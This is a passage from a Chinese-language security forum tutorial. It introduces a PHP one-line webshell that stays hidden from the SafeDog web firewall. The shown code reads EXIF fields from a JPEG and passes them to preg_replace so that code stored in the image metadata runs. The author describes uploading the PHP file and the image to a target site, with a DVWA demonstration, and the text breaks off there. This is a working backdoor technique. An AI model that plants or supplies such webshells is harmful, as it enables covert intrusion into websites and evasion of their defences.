一、前言
本文原创作者:sucppVK,本文属i春秋原创奖励计划,未经许可禁止转载!
先说明三点:
- 这个后门就是一句话木马
- 这个不同于我们常说的图片马
- 这个后门是过安全狗的
这个不算什么新姿势,只不过被提到的次数比较少
(各大论坛常见的,无非编码、解码、分割等,本文不属于以上几种)
而且咱们i春秋论坛没有相关资料,小弟就来抛砖引玉了。
学习本教程应具备的基础:
- 基本了解一句话木马
- 会一点点php(善于百度自学的也算)
- 基本了解正则匹配
第一点看我以前写的教程就可以了:
文字教程就在咱们论坛:
http://bbs.ichunqiu.com/thread-17816-1-1.html
二、正文
2.1 先看看效果
下面就是木马的代码:
php <?php $x = exif_read_data('1.jpg'); preg_replace($x['Model'], $x['Make'], ''); ?>
当然不光这个php文件,还有一个隐藏了后门的图片。
也就是上面那段代码里面的1.jpg
将图片和php文件,这两都上传的目标站点,这里用dvwa演示&#